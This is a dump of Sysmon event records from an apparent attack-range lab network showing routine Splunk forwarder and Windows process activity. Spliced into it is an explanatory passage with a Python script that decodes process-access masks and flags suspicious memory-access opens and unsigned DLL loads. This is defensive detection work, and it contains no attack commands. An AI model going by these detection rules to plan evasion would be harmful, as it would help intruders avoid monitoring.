734700x80000000000000001531202Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001531201Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 
734700x80000000000000001531200Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001531199Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001531198Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001531197Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001531196Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001531195Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001531194Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001531193Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User 
Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001531192Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531191Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001531190Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001531189Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001531188Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2trueSplunk, Inc.Valid 10341000x80000000000000001531187Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.328{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001531186Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001531185Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.329{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001531184Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531183Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 
18141800x80000000000000001531182Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531181Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531180Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531179Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:33.328{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001531178Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.159{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\meudewsu.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm2021-04-21 17:30:33.159 11241100x80000000000000001531177Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.159{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\meudewsu.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal2021-04-21 17:30:33.159 10341000x80000000000000001061193Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:33.061{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061192Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:33.061{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061196Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:34.062{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061195Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:34.062{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 534500x80000000000000001531294Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.161{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 10341000x80000000000000001531293Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.161{21761711-613A-6080-C45D-00000000BB01}62082948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531292Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.161{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001531291Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.161{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001531290Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 
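The records above are Sysmon events whose XML tags were lost in extraction, so the fields of each event run together: the leading digits read as EventID, Version, Level, Task and Opcode, followed by Keywords, EventRecordID, Channel, Computer, RuleName and then the event's data fields in schema order. For the EventID 10 (ProcessAccess) records that ends in TargetImage, GrantedAccess and CallTrace, which is where the analyst's attention goes: csrss.exe, conhost.exe and splunkd.exe open splunk-winprintmon.exe with 0x1fffff (PROCESS_ALL_ACCESS), svchost.exe opens ShellExperienceHost.exe and SearchUI.exe with 0x3600, and splunk-admon.exe opens splunkd.exe with 0x101400. The following is an added example, not code from the page, from Sysmon or from Splunk: it parses events in Sysmon's XML export layout, decodes GrantedAccess into the PROCESS_* rights it grants, flags opens that carry memory or thread rights from a source that is not a Windows subsystem process, and flags EventID 7 loads whose signature is absent or not Valid. The sample events are constructed; their values are copied from records on this page (hashes and call traces omitted), except the last one, a hypothetical unsigned load added to exercise the failure branch.

```python
# Added example (not code from the page, Sysmon or Splunk): triage of Sysmon
# EventID 10 (ProcessAccess) and EventID 7 (ImageLoad) records.
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# PROCESS_* access rights from winnt.h; PROCESS_ALL_ACCESS is 0x1FFFFF.
ACCESS_BITS = {
    0x0001: "TERMINATE", 0x0002: "CREATE_THREAD", 0x0008: "VM_OPERATION",
    0x0010: "VM_READ", 0x0020: "VM_WRITE", 0x0040: "DUP_HANDLE",
    0x0080: "CREATE_PROCESS", 0x0100: "SET_QUOTA", 0x0200: "SET_INFORMATION",
    0x0400: "QUERY_INFORMATION", 0x0800: "SUSPEND_RESUME",
    0x1000: "QUERY_LIMITED_INFORMATION", 0x2000: "SET_LIMITED_INFORMATION",
    0x100000: "SYNCHRONIZE",
}
# Rights that let the caller read or alter the target's memory or threads.
MEMORY_RIGHTS = 0x0002 | 0x0008 | 0x0010 | 0x0020 | 0x0040
# Windows subsystem processes open every new process with full access; the
# 0x1fffff opens by csrss.exe and conhost.exe on this page are that pattern.
BENIGN_FULL_ACCESS_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\conhost.exe",
}

def _event(event_id, **data):
    """Build one Event element in Sysmon's XML export layout (constructed data)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'</System><EventData>{fields}</EventData></Event>')

SPLUNK = r"C:\Program Files\SplunkUniversalForwarder\bin"
# Constructed sample: values mirror records on this page, except the last event.
SAMPLE_EVENTS = "<Events>" + "".join([
    _event(10, SourceImage=r"C:\Windows\system32\csrss.exe",
           TargetImage=SPLUNK + r"\splunk-winprintmon.exe", GrantedAccess="0x1fffff"),
    _event(10, SourceImage=SPLUNK + r"\splunkd.exe",
           TargetImage=SPLUNK + r"\splunk-winprintmon.exe", GrantedAccess="0x1fffff"),
    _event(10, SourceImage=r"C:\Windows\system32\svchost.exe",
           TargetImage=r"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe",
           GrantedAccess="0x3600"),
    _event(7, Image=SPLUNK + r"\splunk-winprintmon.exe", ImageLoaded=SPLUNK + r"\libeay32.dll",
           Signed="true", Signature="Splunk, Inc.", SignatureStatus="Valid"),
    # Hypothetical record, not on the page: an unsigned DLL from a user-writable path.
    _event(7, Image=SPLUNK + r"\splunk-winprintmon.exe",
           ImageLoaded=r"C:\Users\Public\unsigned_test.dll",
           Signed="false", Signature="-", SignatureStatus="Unavailable"),
]) + "</Events>"

def parse_events(xml_text):
    """Yield one dict per Event: EventID plus every EventData field by Name."""
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        rec = {"EventID": int(ev.find("e:System/e:EventID", NS).text)}
        for d in ev.findall("e:EventData/e:Data", NS):
            rec[d.get("Name")] = d.text or ""
        yield rec

def decode_access(mask):
    """Names of the PROCESS_* rights present in a GrantedAccess mask, low bit first."""
    return [name for bit, name in sorted(ACCESS_BITS.items()) if mask & bit]

def triage_process_access(rec):
    """Flag opens that grant memory/thread rights from a non-subsystem source."""
    mask = int(rec["GrantedAccess"], 16)
    if rec["SourceImage"].lower() in BENIGN_FULL_ACCESS_SOURCES:
        return None
    if mask & MEMORY_RIGHTS:
        return f"{rec['SourceImage']} -> {rec['TargetImage']}: {','.join(decode_access(mask))}"
    return None

def triage_image_load(rec):
    """Flag loaded images that are unsigned or whose signature is not Valid."""
    if rec["Signed"].lower() != "true" or rec["SignatureStatus"] != "Valid":
        return (f"{rec['Image']} loaded {rec['ImageLoaded']} "
                f"(Signed={rec['Signed']}, {rec['SignatureStatus']})")
    return None

def triage(xml_text):
    """Return the findings for all EventID 10 and 7 records in an XML export."""
    handlers = {10: triage_process_access, 7: triage_image_load}
    findings = []
    for rec in parse_events(xml_text):
        handler = handlers.get(rec["EventID"])
        finding = handler(rec) if handler else None
        if finding:
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

Run against the sample, the csrss.exe open is suppressed, the svchost.exe 0x3600 open decodes to SET_INFORMATION, QUERY_INFORMATION, QUERY_LIMITED_INFORMATION and SET_LIMITED_INFORMATION and is not flagged (no memory rights), and two findings remain: the splunkd.exe open of splunk-winprintmon.exe and the hypothetical unsigned load. The splunkd.exe hit is the parent opening the child it has just started (the page's EventID 1 record for splunk-winprintmon.exe names splunkd.exe as ParentImage); a tuned rule would join EventID 10 against EventID 1 on the target's ProcessGuid and drop opens where SourceProcessGUID equals ParentProcessGuid. Likewise 0x101400 (splunk-admon.exe on splunkd.exe) decodes to QUERY_INFORMATION, QUERY_LIMITED_INFORMATION and SYNCHRONIZE, which carries no memory rights and is not flagged.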
734700x80000000000000001531289Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001531288Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001531287Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x80000000000000001531286Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001531285Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 
17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x80000000000000001531284Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001531283Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft 